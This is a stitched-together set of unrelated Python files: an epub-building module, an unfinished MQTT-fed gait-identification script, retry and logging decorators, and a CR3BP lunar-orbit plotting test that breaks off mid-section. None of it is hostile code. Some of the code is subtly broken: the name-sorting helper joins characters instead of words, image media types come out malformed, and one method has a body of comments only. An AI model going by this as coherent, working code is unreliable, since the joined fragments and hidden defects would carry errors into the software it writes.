# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.

# The epub format specification is available at http://idpf.org/epub/201

'''Contains the EpubBuilder class to build epub2.0.1 files with the getebook
module.'''

import html
import re
import datetime
import getebook
import os.path
import re
import zipfile

__all__ = ['EpubBuilder', 'EpubTOC', 'Author']

def _normalize(name):
    '''Transform "Firstname [Middlenames] Lastname" into
    "Lastname, Firstname [Middlenames]".'''
    split = name.split()
    if len(split) == 1:
        return name
    return split[-1] + ', ' + ' '.join(name[0:-1])

def _make_starttag(tag, attrs):
    'Write a starttag.'
    out = '<' + tag
    for key in attrs:
        out += ' {}="{}"'.format(key, html.escape(attrs[key]))
    out += '>'
    return out

def _make_xml_elem(tag, text, attr = []):
    'Write a flat xml element.'
    out = '    <' + tag
    for (key, val) in attr:
        out += ' {}="{}"'.format(key, val)
    if text:
        out += '>{}</{}>\n'.format(text, tag)
    else:
        out += ' />\n'
    return out

class EpubTOC(getebook.TOC):
    'Table of contents.'
    _head = ((
      '<?xml version="1.0" encoding="UTF-8"?>\n'
      '<ncx xmlns="http://www.daisy.org/z3986/2005/ncx/" version="2005-1" xml:lang="en-US">\n'
      '  <head>\n'
      '    <meta name="dtb:uid" content="{}" />\n'
      '    <meta name="dtb:depth" content="{}" />\n'
      '    <meta name="dtb:totalPageCount" content="0" />\n'
      '    <meta name="dtb:maxPageNumber" content="0" />\n'
      '  </head>\n'
      '  <docTitle>\n'
      '    <text>{}</text>\n'
      '  </docTitle>\n'
    ))
    _doc_author = ((
      '  <docAuthor>\n'
      '    <text>{}</text>\n'
      '  </docAuthor>\n'
    ))
    _navp = ((
      '{0}<navPoint id="nav{1}">\n'
      '{0}  <navLabel>\n'
      '{0}    <text>{2}</text>\n'
      '{0}  </navLabel>\n'
      '{0}  <content src="{3}" />\n'
    ))

    def _navp_xml(self, entry, indent_lvl):
        'Recursively render one TOC entry and its subentries as navPoint XML.'
        pad = '  ' * indent_lvl
        pieces = [self._navp.format(pad, str(entry.no), entry.text,
          entry.target)]
        for child in entry.entries:
            pieces.append(self._navp_xml(child, indent_lvl + 1))
        pieces.append(pad + '</navPoint>\n')
        return ''.join(pieces)

    def write_xml(self, uid, title, authors):
        'Render the complete NCX document for the table of contents.'
        pieces = [self._head.format(uid, self.max_depth, title)]
        pieces.extend(self._doc_author.format(aut) for aut in authors)
        pieces.append('  <navMap>\n')
        pieces.extend(self._navp_xml(entry, 2) for entry in self.entries)
        pieces.append('  </navMap>\n</ncx>')
        return ''.join(pieces)

class _Fileinfo:
    'Information about a component file of an epub.'
    def __init__(self, name, in_spine = True, guide_title = None,
                 guide_type = None):
        '''Initialize the object. If the file does not belong in the
        reading order, in_spine should be set to False. If it should
        appear in the guide, set guide_title and guide_type.'''
        self.name = name
        (self.ident, ext) = os.path.splitext(name)
        name_split = name.rsplit('.', 1)
        self.ident = name_split[0]
        self.in_spine = in_spine
        self.guide_title = guide_title
        self.guide_type = guide_type
        # Infer media-type from file extension
        ext = ext.lower()
        if ext in ('.htm', '.html', '.xhtml'):
            self.media_type = 'application/xhtml+xml'
        elif ext in ('.png', '.gif', '.jpeg'):
            self.media_type = 'image/' + ext
        elif ext == '.jpg':
            self.media_type = 'image/jpeg'
        elif ext == '.css':
            self.media_type = 'text/css'
        elif ext == '.ncx':
            self.media_type = 'application/x-dtbncx+xml'
        else:
            raise ValueError('Can\'t infer media-type from extension: %s' % ext)
    def manifest_entry(self):
        'Write the XML element for the manifest.'
        return _make_xml_elem('item', '',
          [
            ('href', self.name),
            ('id', self.ident),
            ('media-type', self.media_type)
          ])
    def spine_entry(self):
        '''Write the XML element for the spine.
        (Empty string if in_spine is False.)'''
        if self.in_spine:
            return _make_xml_elem('itemref', '', [('idref', self.ident)])
        else:
            return ''
    def guide_entry(self):
        '''Write the XML element for the guide.
        (Empty string if no guide title and type are given.)'''
        if self.guide_title and self.guide_type:
            return _make_xml_elem('reference', '',
              [
                ('title', self.guide_title),
                ('type', self.guide_type),
                ('href', self.name)
              ])
        else:
            return ''

class _EpubMeta:
    'Metadata entry for an epub file.'
    def __init__(self, tag, text, *args):
        '''The metadata entry is an XML element. *args is used for
        supplying the XML element's attributes as (key, value) pairs.'''
        self.tag = tag
        self.text = text
        self.attr = args
    def write_xml(self):
        'Write the XML element.'
        return _make_xml_elem(self.tag, self.text, self.attr)
    def __repr__(self):
        'Returns the text.'
        return self.text
    def __str__(self):
        'Returns the text.'
        return self.text

class _EpubDate(_EpubMeta):
    'Metadata element for the publication date.'
    _date_re = re.compile('^([0-9]{4})(-[0-9]{2}(-[0-9]{2})?)?$')
    def __init__(self, date):
        '''date must be a string of the form "YYYY[-MM[-DD]]". If it is
        not of this form, or if the date is invalid, ValueError is
        raised.'''
        m = self._date_re.match(date)
        if not m:
            raise ValueError('invalid date format')
        year = int(m.group(1))
        # BUG FIX: absent optional groups are None, so `m.group(2)[1:]`
        # raised TypeError -- never the IndexError the old handlers caught.
        # A year-only date like "2020" therefore crashed. Test explicitly.
        if m.group(2) is not None:
            mon = int(m.group(2)[1:])
            # BUG FIX: was `mon < 0`, which accepted month 00 despite the
            # error message promising 1..12.
            if mon < 1 or mon > 12:
                raise ValueError('month must be in 1..12')
            if m.group(3) is not None:
                day = int(m.group(3)[1:])
                datetime.date(year, mon, day) # raises ValueError if invalid
        self.tag = 'dc:date'
        self.text = date
        self.attr = ()

class _EpubLang(_EpubMeta):
    'Metadata element for the language of the book.'
    _lang_re = re.compile('^[a-z]{2}(-[A-Z]{2})?$')
    def __init__(self, lang):
        '''lang must be a lower-case two-letter language code,
        optionally followed by a "-" and a upper-case two-letter country
        code. (e.g., "en", "en-US", "en-UK", "de", "de-DE", "de-AT")'''
        # Guard clause instead of the original if/else.
        if not self._lang_re.match(lang):
            raise ValueError('invalid language format')
        self.tag = 'dc:language'
        self.text = lang
        self.attr = ()

class Author(_EpubMeta):
    '''To control the file-as and role attribute for the authors, pass
    an Author object to the EpubBuilder instead of a string. The file-as
    attribute is a form of the name used for sorting. The role attribute
    describes how the person was involved in the work.

    You ONLY need this if an author's name is not of the form
    "Given-name Family-name", or if you want to specify a role other
    than author. Otherwise, you can just pass a string.

    The value of role should be a MARC relator, e.g., "aut" for author
    or "edt" for editor. See http://www.loc.gov/marc/relators/ for a
    full list.'''
    def __init__(self, name, fileas = None, role = 'aut'):
        '''Initialize the object. When "fileas" is omitted, a
        "Last-name, First-name" form derived from the name is used; when
        "role" is omitted, it defaults to "aut".'''
        sort_name = fileas if fileas else _normalize(name)
        self.tag = 'dc:creator'
        self.text = name
        self.attr = (('opf:file-as', sort_name), ('opf:role', role))

class _OPFfile:
    '''Class for writing the OPF (Open Packaging Format) file for an
    epub file. The OPF file contains the metadata, a manifest of all
    component files in the epub, a "spine" which specifies the reading
    order and a guide which points to important components of the book
    such as the title page.'''

    _opf = (
      '<?xml version="1.0" encoding="UTF-8"?>\n'
      '<package version="2.0" xmlns="http://www.idpf.org/2007/opf" unique_identifier="uid_id">\n'
      '  <metadata xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:opf="http://www.idpf.org/2007/opf">\n'
      '{}'
      '  </metadata>\n'
      '  <manifest>\n'
      '{}'
      '  </manifest>\n'
      '  <spine toc="toc">\n'
      '{}'
      '  </spine>\n'
      '  <guide>\n'
      '{}'
      '  </guide>\n'
      '</package>\n'
    )
    def __init__(self):
        'Initialize.'
        self.meta = []
        self.filelist = []
    def write_xml(self):
        'Write the XML code for the OPF file.'
        metadata = ''
        for elem in self.meta:
            metadata += elem.write_xml()
        manif = ''
        spine = ''
        guide = ''
        for finfo in self.filelist:
            manif += finfo.manifest_entry()
            spine += finfo.spine_entry()
            guide += finfo.guide_entry()
        return self._opf.format(metadata, manif, spine, guide)

class EpubBuilder:
    '''Builds an epub2.0.1 file. Some of the attributes of this class
    (title, uid, lang) are marked as "mandatory" because they represent
    metadata that is required by the epub specification. If these
    attributes are left unset, default values will be used.'''

    _style_css = (
      'h1, h2, h3, h4, h5, h6 {\n'
      '  text-align: center;\n'
      '}\n'
      'p {\n'
      '  text-align: justify;\n'
      '  margin-top: 0.125em;\n'
      '  margin-bottom: 0em;\n'
      '  text-indent: 1.0em;\n'
      '}\n'
      '.getebook-tp {\n'
      '  margin-top: 8em;\n'
      '}\n'
      '.getebook-tp-authors {\n'
      '  font-size: 2em;\n'
      '  text-align: center;\n'
      '  margin-bottom: 1em;\n'
      '}\n'
      '.getebook-tp-title {\n'
      '  font-weight: bold;\n'
      '  font-size: 3em;\n'
      '  text-align: center;\n'
      '}\n'
      '.getebook-tp-sub {\n'
      '  text-align: center;\n'
      '  font-weight: normal;\n'
      '  font-size: 0.8em;\n'
      '  margin-top: 1em;\n'
      '}\n'
      '.getebook-false-h {\n'
      '  font-weight: bold;\n'
      '  font-size: 1.5em;\n'
      '}\n'
      '.getebook-small-h {\n'
      '  font-style: normal;\n'
      '  font-weight: normal;\n'
      '  font-size: 0.8em;\n'
      '}\n'
    )

    _container_xml = (
      '<?xml version="1.0"?>\n'
      '<container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container">\n'
      '  <rootfiles>\n'
      '    <rootfile full-path="package.opf" media-type="application/oebps-package+xml"/>\n'
      '  </rootfiles>\n'
      '</container>\n'
    )

    _html = (
      '<?xml version="1.0" encoding="utf-8"?>\n'
      '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">\n'
      '<html xmlns="http://www.w3.org/1999/xhtml">\n'
      '  <head>\n'
      '    <title>{}</title>\n'
      # BUG FIX: the content-type was misspelled "application/xtml+xml".
      '    <meta http-equiv="content-type" content="application/xhtml+xml; charset=utf-8" />\n'
      '    <link href="style.css" rel="stylesheet" type="text/css" />\n'
      '  </head>\n'
      '  <body>\n{}'
      '  </body>\n'
      '</html>\n'
    )

    # Set to True once finalize() has run, to make it idempotent.
    _finalized = False

    def __init__(self, epub_file):
        '''Initialize the EpubBuilder instance. "epub_file" is the
        filename of the epub to be created.'''
        self.epub_f = zipfile.ZipFile(epub_file, 'w', zipfile.ZIP_DEFLATED)
        self.epub_f.writestr('mimetype', 'application/epub+zip')
        self.epub_f.writestr('META-INF/container.xml', self._container_xml)
        self.toc = EpubTOC()
        self.opf = _OPFfile()
        self.opf.filelist.append(_Fileinfo('toc.ncx', False))
        self.opf.filelist.append(_Fileinfo('style.css', False))
        self._authors = []
        self.opt_meta = {} # Optional metadata (other than authors)
        self.content = ''
        self.part_no = 0
        self.cont_filename = 'part%03d.html' % self.part_no

    def __enter__(self):
        'Return self for use in with ... as ... statement.'
        return self

    def __exit__(self, except_type, except_val, traceback):
        'Call finalize() and close the file.'
        try:
            self.finalize()
        finally:
            # Close again in case an exception happened in finalize()
            self.epub_f.close()
        return False

    @property
    def uid(self):
        '''Unique identifier of the ebook. (mandatory)

        If this property is left unset, a pseudo-random string will be
        generated which is long enough for collisions with existing
        ebooks to be extremely unlikely.'''
        try:
            return self._uid
        except AttributeError:
            import random
            from string import (ascii_letters, digits)
            alnum = ascii_letters + digits
            self.uid = ''.join([random.choice(alnum) for i in range(15)])
            return self._uid
    @uid.setter
    def uid(self, val):
        self._uid = _EpubMeta('dc:identifier', str(val), ('id', 'uid_id'))

    @property
    def title(self):
        '''Title of the ebook. (mandatory)

        If this property is left unset, it defaults to "Untitled".'''
        try:
            return self._title
        except AttributeError:
            self.title = 'Untitled'
            return self._title
    @title.setter
    def title(self, val):
        # If val is not a string, raise TypeError now rather than later.
        self._title = _EpubMeta('dc:title', '' + val)

    @property
    def lang(self):
        '''Language of the ebook. (mandatory)

        The language must be given as a lower-case two-letter code, optionally
        followed by a "-" and an upper-case two-letter country code.
        (e.g., "en", "en-US", "en-UK", "de", "de-DE", "de-AT")

        If this property is left unset, it defaults to "en".'''
        try:
            return self._lang
        except AttributeError:
            self.lang = 'en'
            return self._lang
    @lang.setter
    def lang(self, val):
        self._lang = _EpubLang(val)

    @property
    def author(self):
        '''Name of the author. (optional)

        If there are multiple authors, pass a list of strings.

        To control the file-as and role attribute, use author objects instead
        of strings; file-as is an alternate form of the name used for sorting.
        For a description of the role attribute, see the docstring of the
        author class.'''
        if len(self._authors) == 1:
            return self._authors[0]
        return tuple([aut for aut in self._authors])
    @author.setter
    def author(self, val):
        if isinstance(val, Author) or isinstance(val, str):
            authors = [val]
        else:
            authors = val
        for aut in authors:
            try:
                self._authors.append(Author('' + aut))
            except TypeError:
                # aut is not a string, so it should be an Author object
                self._authors.append(aut)
    @author.deleter
    def author(self):
        self._authors = []

    @property
    def date(self):
        '''Publication date. (optional)

        Must be given in "YYYY[-MM[-DD]]" format.'''
        try:
            return self.opt_meta['date']
        except KeyError:
            return None
    @date.setter
    def date(self, val):
        self.opt_meta['date'] = _EpubDate(val)
    @date.deleter
    def date(self):
        # BUG FIX: the setter stores the value in opt_meta['date'];
        # `del self._date` referenced an attribute that never exists, so
        # deletion always raised AttributeError and never removed the date.
        del self.opt_meta['date']

    @property
    def rights(self):
        'Copyright/licensing information. (optional)'
        try:
            return self.opt_meta['rights']
        except KeyError:
            return None
    @rights.setter
    def rights(self, val):
        self.opt_meta['rights'] = _EpubMeta('dc:rights', '' + val)
    @rights.deleter
    def rights(self):
        # BUG FIX: see the date deleter -- must delete from opt_meta.
        del self.opt_meta['rights']

    @property
    def publisher(self):
        'Publisher name. (optional)'
        try:
            return self.opt_meta['publisher']
        except KeyError:
            return None
    @publisher.setter
    def publisher(self, val):
        self.opt_meta['publisher'] = _EpubMeta('dc:publisher', '' + val)
    @publisher.deleter
    def publisher(self):
        # BUG FIX: see the date deleter -- must delete from opt_meta.
        del self.opt_meta['publisher']

    @property
    def style_css(self):
        '''CSS stylesheet for the files that are generated by the EpubBuilder
        instance. Can be overwritten or extended, but not deleted.'''
        return self._style_css
    @style_css.setter
    def style_css(self, val):
        self._style_css = '' + val

    def titlepage(self, main_title = None, subtitle = None):
        '''Create a title page for the ebook. If no main_title is given,
        the title attribute of the EpubBuilder instance is used.'''
        tp = '<div class="getebook-tp">\n'
        if len(self._authors) >= 1:
            if len(self._authors) == 1:
                aut_str = str(self._authors[0])
            else:
                # BUG FIX: the old code str()-ed the author *list slice* and
                # then joined the characters of that repr; join the
                # individual author names instead.
                aut_str = ', '.join(str(aut) for aut in self._authors[0:-1]) \
                                                       + ', and ' + str(self._authors[-1])
            tp += '<div class="getebook-tp-authors">%s</div>\n' % aut_str
        if not main_title:
            main_title = str(self.title)
        tp += '<div class="getebook-tp-title">%s' % main_title
        if subtitle:
            tp += '<div class="getebook-tp-sub">%s</div>' % subtitle
        tp += '</div>\n</div>\n'
        self.opf.filelist.insert(0, _Fileinfo('title.html',
          guide_title = 'Titlepage', guide_type = 'title-page'))
        self.epub_f.writestr('title.html', self._html.format(self.title, tp))

    def headingpage(self, heading, subtitle = None, toc_text = None):
        '''Create a page containing only a (large) heading, optionally
        with a smaller subtitle. If toc_text is not given, it defaults
        to the heading.'''
        self.new_part()
        tag = 'h%d' % min(6, self.toc.depth)
        self.content += '<div class="getebook-tp">'
        self.content += '<{} class="getebook-tp-title">{}'.format(tag, heading)
        if subtitle:
            self.content += '<div class="getebook-tp-sub">%s</div>' % subtitle
        self.content += '</%s>\n' % tag
        # BUG FIX: close the wrapping "getebook-tp" div opened above; it was
        # previously left unclosed, producing invalid XHTML.
        self.content += '</div>\n'
        if not toc_text:
            toc_text = heading
        self.toc.new_entry(toc_text, self.cont_filename)
        self.new_part()

    def insert_file(self, name, in_spine = False, guide_title = None,
      guide_type = None, arcname = None):
        '''Include an external file into the ebook. By default, it will
        be added to the archive under its basename; the argument
        "arcname" can be used to specify a different name.'''
        if not arcname:
            arcname = os.path.basename(name)
        self.opf.filelist.append(_Fileinfo(arcname, in_spine, guide_title,
                                 guide_type))
        self.epub_f.write(name, arcname)

    def add_file(self, arcname, str_or_bytes, in_spine = False,
      guide_title = None, guide_type = None):
        '''Add the string or bytes instance str_or_bytes to the archive
        under the name arcname.'''
        self.opf.filelist.append(_Fileinfo(arcname, in_spine, guide_title,
                                 guide_type))
        self.epub_f.writestr(arcname, str_or_bytes)

    def false_heading(self, elem):
        '''Handle a "false heading", i.e., text that appears in heading
        tags in the source even though it is not a chapter heading.'''
        elem.attrs['class'] = 'getebook-false-h'
        elem.tag = 'p'
        self.handle_elem(elem)

    def _heading(self, elem):
        '''Write a heading.'''
        # Handle paragraph heading if we have one waiting (see the
        # par_heading method). We don't use _handle_par_h here because
        # we merge it with the subsequent proper heading.
        try:
            par_h = self.par_h
            del self.par_h
        except AttributeError:
            toc_text = elem.text
        else:
            # There is a waiting paragraph heading, we merge it with the
            # new heading.
            toc_text = par_h.text + '. ' + elem.text
            par_h.tag = 'div'
            par_h.attrs['class'] = 'getebook-small-h'
            elem.children.insert(0, par_h)
        # Set the class attribute value.
        elem.attrs['class'] = 'getebook-chapter-h'
        self.toc.new_entry(toc_text, self.cont_filename)
        # Add heading to the epub.
        tag = 'h%d' % min(self.toc.depth, 6)
        self.content += _make_starttag(tag, elem.attrs)
        for elem in elem.children:
            self.handle_elem(elem)
        self.content += '</%s>\n' % tag

    def par_heading(self, elem):
        '''Handle a "paragraph heading", i.e., a chaper heading or part
        of a chapter heading inside paragraph tags. If it is immediately
        followed by a heading, they will be merged into one.'''
        self.par_h = elem

    def _handle_par_h(self):
        'Check if there is a waiting paragraph heading and handle it.'
        try:
            self._heading(self.par_h)
        except AttributeError:
            pass

    def handle_elem(self, elem):
        'Handle html element as supplied by getebook.EbookParser.'
        try:
            tag = elem.tag
        except AttributeError:
            # elem should be a string
            is_string = True
            tag = None
        else:
            is_string = False
        if tag in getebook._headings:
            self._heading(elem)
        else:
            # Handle waiting par_h if necessary (see par_heading)
            try:
                self._heading(self.par_h)
            except AttributeError:
                pass
            if is_string:
                self.content += elem
            elif tag == 'br':
                self.content += '<br />\n'
            elif tag == 'img':
                self.content += self._handle_image(elem.attrs) + '\n'
            elif tag == 'a' or tag == 'noscript':
                # Ignore tag, just write child elements
                for child in elem.children:
                    self.handle_elem(child)
            else:
                self.content += _make_starttag(tag, elem.attrs)
                for child in elem.children:
                    self.handle_elem(child)
                self.content += '</%s>' % tag
                if tag == 'p':
                    self.content += '\n'

    def _handle_image(self, attrs):
        'Returns the alt text of an image tag.'
        try:
            return attrs['alt']
        except KeyError:
            return ''

    def new_part(self):
        '''Begin a new part of the epub. Write the current html document
        to the archive and begin a new one.'''
        # Handle waiting par_h (see par_heading)
        try:
            self._heading(self.par_h)
        except AttributeError:
            pass
        if self.content:
            html = self._html.format(self.title, self.content)
            self.epub_f.writestr(self.cont_filename, html)
            self.part_no += 1
        self.content = ''
        self.cont_filename = 'part%03d.html' % self.part_no
        self.opf.filelist.append(_Fileinfo(self.cont_filename))

    def finalize(self):
        'Complete and close the epub file.'
        if self._finalized:
            # Avoid finalizing twice. Otherwise, calling finalize inside
            # a with-block would lead to an exception when __exit__
            # calls finalize again.
            return
        # Handle waiting par_h (see par_heading)
        try:
            self._heading(self.par_h)
        except AttributeError:
            pass
        if self.content:
            html = self._html.format(self.title, self.content)
            self.epub_f.writestr(self.cont_filename, html)
        self.opf.meta = [self.uid, self.lang, self.title] + self._authors
        self.opf.meta += self.opt_meta.values()
        self.epub_f.writestr('package.opf', self.opf.write_xml())
        self.epub_f.writestr('toc.ncx',
          self.toc.write_xml(self.uid, self.title, self._authors))
        self.epub_f.writestr('style.css', self._style_css)
        self.epub_f.close()
        self._finalized = True

import numpy as np
import pandas as pd
from pandas import Series, DataFrame
from scipy.spatial import distance
import matplotlib.pyplot as plt

from sklearn.cluster import DBSCAN
from sklearn import metrics
from sklearn.datasets.samples_generator import make_blobs
from sklearn.preprocessing import StandardScaler
from sklearn import decomposition  # PCA
from sklearn.metrics import confusion_matrix

import json

import ml.Features as ft
from utils import Utils

class Identifier(object):

    def __init__(self):
        # One row per observed walking event: geometry features, timing,
        # girth, and the subject id label.
        feature_columns = ['mean_height', 'min_height', 'max_height',
                           'mean_width', 'min_width', 'max_width',
                           'time', 'girth', 'id']
        self.data = DataFrame(columns=feature_columns)
        self.event = []

    @staticmethod
    def subscribe(ch, method, properties, body):
        """
        Default message callback, intended to process the body message.
        :param ch: keep null
        :param method: keep null
        :param properties: keep null
        :param body: the message
        :return:
        """
        # first we get the JSON from body
        # we check if it's part of the walking event
        # if walking event is completed, we ... (left unfinished upstream)

if __name__ == '__main__':
    # we setup needed params
    MAX_HEIGHT = 203
    MAX_WIDTH = 142
    SPEED = 3
    SAMPLING_RATE = 8
    mq_host = '172.26.56.122'
    queue_name = 'door_data'
    # setting up MQTT subscriber
    # BUG FIX: `subscribe` is a static method of Identifier, not a
    # module-level name; the bare reference raised NameError at runtime.
    Utils.sub(queue_name=queue_name, callback=Identifier.subscribe, host=mq_host)
#!-*- coding:utf-8 -*-
import time


def retries(times=3, timeout=1):
    """Retry the wrapped function when it raises an exception.

    Up to ``times`` attempts are made; the sleep between attempts grows
    by ``timeout`` seconds each retry (linear back-off). If every attempt
    fails, ``None`` is returned (the original best-effort behaviour).
    """
    def decorator(func):
        def _wrapper(*args, **kw):
            delay = 0
            for attempt in range(1, times + 1):
                try:
                    return func(*args, **kw)
                except Exception:
                    # Narrowed from a bare `except:` so KeyboardInterrupt
                    # and SystemExit are no longer swallowed.
                    delay += timeout
                    if attempt < times:
                        time.sleep(delay)
        return _wrapper
    return decorator


def empty_content_retries(times=3, timeout=2):
    """Retry the wrapped function when it returns an empty/falsy result.

    Up to ``times`` attempts are made; the sleep between attempts grows
    by ``timeout`` seconds each retry. Returns the first truthy result,
    or ``None`` when every attempt came back empty.
    """
    def decorator(func):
        def _wrapper(*args, **kw):
            delay = 0
            for attempt in range(1, times + 1):
                result = func(*args, **kw)
                if result:
                    return result
                delay += timeout
                # BUG FIX: the original slept once more *after* the final
                # attempt, wasting time before giving up.
                if attempt < times:
                    time.sleep(delay)
        return _wrapper
    return decorator


def use_logging(level):
    """Parameterized decorator: log the wrapped function's name at call
    time when level is "warn" or "info"; other levels log nothing."""
    def decorator(func):
        # BUG FIX: was the Python 2 statement `print func.__name__`, a
        # SyntaxError under Python 3 (the rest of this file already uses
        # print() calls). Printed once, at decoration time.
        print(func.__name__)
        def wrapper(*args, **kwargs):
            # Both recognised levels emit the same message format.
            if level in ("warn", "info"):
                print ("level:%s, %s is running" % (level, func.__name__))
            return func(*args, **kwargs)
        return wrapper
    return decorator

if __name__ == "__main__":
    @use_logging(level="warn")
    def foo(name='foo'):
        print("i am %s" % name)
    foo()
"""
********************************************************************
      Test file for implementation check of CR3BP library.
********************************************************************

Last update: 21/01/2022

Description
-----------
Contains a few sample orbit propagations to test the CR3BP library.

The orbits currently found in test file include:
    - L2 southern NRHO (9:2 NRHO of Lunar Gateway Station)
    - Distant Retrograde Orbit (DRO)
    - Butterfly Orbit
    - L2 Vertical Orbit
"""

# Testing CR3BP implementation

import matplotlib.pyplot as plt
import numpy as np
from astropy import units as u
from CR3BP import getChar_CR3BP, propagate, propagateSTM

from poliastro.bodies import Earth, Moon

# Earth-Moon system properties
k1 = Earth.k.to(u.km**3 / u.s**2).value  # Earth gravitational parameter [km^3/s^2]
k2 = Moon.k.to(u.km**3 / u.s**2).value  # Moon gravitational parameter [km^3/s^2]
r12 = 384747.99198  # Earth-Moon distance

# Compute CR3BP characteristic values (mass ratio mu plus the characteristic
# scales; presumably kstr/lstr/tstr/vstr/nstr are the characteristic
# gravitational parameter, length, time, velocity and mean motion --
# TODO confirm against the CR3BP library's documentation).
mu, kstr, lstr, tstr, vstr, nstr = getChar_CR3BP(k1, k2, r12)


# -- Lunar Gateway Station Orbit - 9:2 NRHO

"""
The orbit is a Near-Rectilinear Halo Orbit (NRHO) around the L2 Lagrangian
point of the Earth-Moon system. The orbit presented here is a southern
sub-family of the L2-NRHO. This orbit is a 9:2 resonant orbit currently set
as the candidate orbit for the Lunar Gateway Station (LOP-G). It's called
9:2 resonant since a spacecraft would complete 9 orbits in the NRHO for
every 2 lunar months (slightly different from the lunar orbit period).

The exact orbital elements presented here are from the author's simulations.
The orbit states were obtained starting from guess solutions given in various
references. A few are provided below:

Ref: White Paper: Gateway Destination Orbit Model: A Continuous 15 Year NRHO
    Reference Trajectory - NASA, 2019
Ref: Strategies for Low-Thrust Transfer Design Based on Direct Collocation
    Techniques - Park, Howell and Folta

The NRHOs are a subfamily of the Halo orbits. The 'Near-Rectilinear' term comes
from the very elongated shape of the orbit compared to a regular Halo. Halo
orbits occur at all three co-linear equilibrium points L1, L2 and L3. They occur
in a pair of variants (northern and southern) due to the symmetry of the CR3BP.
"""

# 9:2 L2 southern NRHO orbit
# Non-dimensional initial position, initial velocity and period.
# NOTE(review): r0 is a 2-D (1, 3) array here but 1-D in the other sections
# of this file -- presumably propagate() accepts both shapes; confirm.
r0 = np.array([[1.021881345465263, 0, -0.182000000000000]])
v0 = np.array([0, -0.102950816739606, 0])
tf = 1.509263667286943

# number of points to plot
Nplt = 300
tofs = np.linspace(0, tf, Nplt)

# propagate the base trajectory
rf, vf = propagate(mu, r0, v0, tofs, rtol=1e-11)

# plotting orbit
rf = np.array(rf)

fig = plt.figure()
ax = plt.axes(projection="3d")
ax.set_box_aspect(
    (np.ptp(rf[:, 0]), np.ptp(rf[:, 1]), np.ptp(rf[:, 2]))
)  # aspect ratio is 1:1:1 in data space
# plotting the Moon at its non-dimensional rotating-frame position (1 - mu, 0, 0)
ax.plot3D(1 - mu, 0, 0, "ok")
ax.set_title("L2 Southern NRHO")
ax.set_xlabel("x-axis [nd]")
ax.set_ylabel("y-axis [nd]")
ax.set_zlabel("z-axis [nd]")

ax.plot3D(rf[:, 0], rf[:, 1], rf[:, 2], "b")
plt.show()


"""
All other orbits in this section are computed from guess solutions available
in Grebow's Master's and PhD theses. He lists a quite detailed set of methods
to compute most of the major periodic orbits presented here. All of
them use differential correction methods which are not yet implemented in this
library.

Ref: GENERATING PERIODIC ORBITS IN THE CIRCULAR RESTRICTED THREE-BODY PROBLEM
    WITH APPLICATIONS TO LUNAR SOUTH POLE COVERAGE
    - D. Grebow 2006 (Master's thesis)
Ref: TRAJECTORY DESIGN IN THE EARTH-MOON SYSTEM
    AND LUNAR SOUTH POLE COVERAGE
    - D. Grebow 2010 (PhD dissertation)
"""


# -- DRO orbit

# DRO orbit states
# Non-dimensional initial position, initial velocity and period.

r0 = np.array([0.783390492345344, 0, 0])
v0 = np.array([0, 0.548464515316651, 0])
tf = 3.63052604667440

# number of points to plot
Nplt = 300
tofs = np.linspace(0, tf, Nplt)

# propagate the base trajectory
rf, vf = propagate(mu, r0, v0, tofs, rtol=1e-11)


# plotting orbit
rf = np.array(rf)

fig = plt.figure()
ax = plt.axes(projection="3d")
ax.set_box_aspect(
    (np.ptp(rf[:, 0]), np.ptp(rf[:, 1]), np.ptp(rf[:, 2]))
)  # aspect ratio is 1:1:1 in data space
# plotting the Moon at its non-dimensional rotating-frame position (1 - mu, 0, 0)
ax.plot3D(1 - mu, 0, 0, "ok")
# Fix: title previously misspelled "Restrograde"
ax.set_title("Distant Retrograde orbit (DRO)")
ax.set_xlabel("x-axis [nd]")
ax.set_ylabel("y-axis [nd]")
ax.set_zlabel("z-axis [nd]")

ax.plot3D(rf[:, 0], rf[:, 1], rf[:, 2], "m")
plt.show()


# -- Butterfly orbit

# Butterfly orbit states
# Non-dimensional initial position, initial velocity and period.

r0 = np.array([1.03599510774957, 0, 0.173944812752286])
v0 = np.array([0, -0.0798042160573269, 0])
tf = 2.78676904546834

# number of points to plot
Nplt = 300
tofs = np.linspace(0, tf, Nplt)

# propagate the base trajectory
rf, vf = propagate(mu, r0, v0, tofs, rtol=1e-11)

# plotting orbit
rf = np.array(rf)

fig = plt.figure()
ax = plt.axes(projection="3d")
ax.set_box_aspect(
    (np.ptp(rf[:, 0]), np.ptp(rf[:, 1]), np.ptp(rf[:, 2]))
)  # aspect ratio is 1:1:1 in data space
# plotting the Moon at its non-dimensional rotating-frame position (1 - mu, 0, 0)
ax.plot3D(1 - mu, 0, 0, "ok")
ax.set_title("Butterfly orbit")
ax.set_xlabel("x-axis [nd]")
ax.set_ylabel("y-axis [nd]")
ax.set_zlabel("z-axis [nd]")

ax.plot3D(rf[:, 0], rf[:, 1], rf[:, 2], "r")
plt.show()


# -- Vertical orbit

# Vertical orbit states
# Non-dimensional initial position, initial velocity and period.
# NOTE: r0, v0 and tofs set here are reused by the STM propagation below.

r0 = np.array([0.504689989562366, 0, 0.836429774762193])
v0 = np.array([0, 0.552722840538063, 0])
tf = 6.18448756121754

# number of points to plot
Nplt = 300
tofs = np.linspace(0, tf, Nplt)

# propagate the base trajectory
rf, vf = propagate(mu, r0, v0, tofs, rtol=1e-11)

# plotting orbit
rf = np.array(rf)

fig = plt.figure()
ax = plt.axes(projection="3d")
ax.set_box_aspect(
    (np.ptp(rf[:, 0]), np.ptp(rf[:, 1]), np.ptp(rf[:, 2]))
)  # aspect ratio is 1:1:1 in data space
# plotting the Moon at its non-dimensional rotating-frame position (1 - mu, 0, 0)
ax.plot3D(1 - mu, 0, 0, "ok")
